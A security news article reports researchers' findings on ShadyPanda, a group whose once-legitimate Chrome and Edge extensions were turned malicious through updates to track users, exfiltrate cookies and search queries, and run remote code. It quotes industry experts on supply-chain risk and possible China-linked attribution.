ShadyPanda has been playing the long game. Over the last seven years, the group has been uploading malicious extensions on the downlow, gaining user trust and then weaponizing them.  

The threat actors have uploaded somewhere north of 100 malicious extensions, say Koi Security researchers, who said the extensions can track and profile Chrome and Microsoft Edge users as well as execute a payload on systems. 

According to Koi Security researchers, ShadyPanda has published more than 100 malicious extensions that can track and profile Chrome and Microsoft Edge users as well as execute a payload on their systems. Seems like users have fallen for their machinations — the extensions have been downloaded more than four million times, with some still available to unsuspecting users. 

“Malicious code poses a real challenge since it closely resembles legitimate code, leveraging the same convenience features but with bad intent,” says Diane Downie, senior software architect at Black Duck.  

Not all of ShadyPanda’s extensions started as malicious. Early on, the group uploaded five legitimate extensions to the official Google store — three were published between 2018 and 2019. After Google gave them ‘Featured’ and ‘Verified’ statuses, the extensions were weaponized via a malicious update sometime in 2024, with the Clean Master extension being installed 300,000 times. Through that update, the extensions became a framework for remote code execution.  

“These extensions now run hourly remote code execution — downloading and executing arbitrary JavaScript with full browser access,” according to a Koi blog. “They monitor every website visit, exfiltrate encrypted browsing history, and collect complete browser fingerprints.” 

The auto-update mechanisms that are “designed to keep users safe became the attack vector,” says Randolph Barr, chief information security Officer at Cequence Security. “Chrome and Edge’s trusted update pipelines silently delivered malware with no phishing, no social engineering, and no user interaction. What were benign productivity tools suddenly became surveillance platforms.” 

The group has been busy with its nefarious acts, running an affiliate fraud campaign in 2023 — ShadyPanda published 20 Chrome extensions under “nuggetsno15” and 125 Edge extensions under the name Zhang. In that campaign, affiliate tracking codes were injected, unbeknownst to victims, every time they clicked on eBay, Amazon or Booking.com.  

ShadyPanda followed that campaign in 2024 with something much bolder.  “The next wave, in early 2024, shifted from passive monetization to active browser control. 

The Infinity V+ extension exemplifies this phase,” Koi Security says. “Disguised as a new tab productivity tool, it hijacked core browser functionality,” using search redirection to a browser hijacker called trovi.com to log, monetize and sell search queries. It used cookie exfiltration, reading “cookies from specific domains and send(ing) tracking data to nossl.dergoodting.com” then creating “unique identifiers to monitor browsing activity. All without consent or disclosure.” 

The group relied on search query harvesting to send “every keystroke in the search box sent to external servers (s-85283.gotocdn[.]com and s-82923.gotocdn[.]com).” That way, they got “real-time profiling of user interests before you even hit enter [with] the extension capturing) partial queries, typos, corrections – building a detailed map of your thought process,” Koi Security researchers wrote.  

All were “transmitted over unencrypted HTTP connections, making the data easy to intercept and monetize,” the researchers say. “Not just what you search for, but how you think about searching for it.” 

Barr says the risk extends beyond people. “For companies, a malicious browser extension can access everything a user sees—including session cookies, API keys, cloud console tokens, developer credentials, and internal SaaS traffic,” he says. 

Infected developer workstations, he points out, “can lead straight to repository breach and software supply chain infiltration” with every login to cloud services, internal dashboards, API gateways, or CI/CD pipelines “accessible to the attacker.” 

Barr calls ShadyPanda’s activities “a textbook example of a modern supply-chain vulnerability where the trust entrenched in browser ecosystems is leveraged against consumers” and which “mirrors the operating style of several long-term China-nexus cyber-espionage groups: patient, well-funded, and focused on high-value data gathering.” 

So far, attribution has not been proven. Still, Barr says, “the tactics, extensive stay time, and strategic nature of the operation are consistent with China-linked activities identified by several threat intelligence teams over the years.” 

Also of concern is how ShadyPanda operated under the radar. “What’s most striking is how long this campaign remained undetected: seven years of quietly building distribution, acquiring compromised developer accounts, publishing legitimate extensions, and waiting for the right moment to activate the malicious payloads,” says Barr, who notes the group “emphasizes the reality that browser extension ecosystems remain one of the least controlled and most vulnerable areas of the modern enterprise attack surface” that traditional ML-based scanning in Chrome and stricter review processes in Edge “aren’t equipped to detect delayed malicious updates or compromised developer accounts.” 

Downie warns the industry not to “let its guard down as bad actors have strong incentives to play the long game in a landscape where almost everything is software-enabled.” She encourages the adoption of zero trust to combat miscreants like ShadyPanda.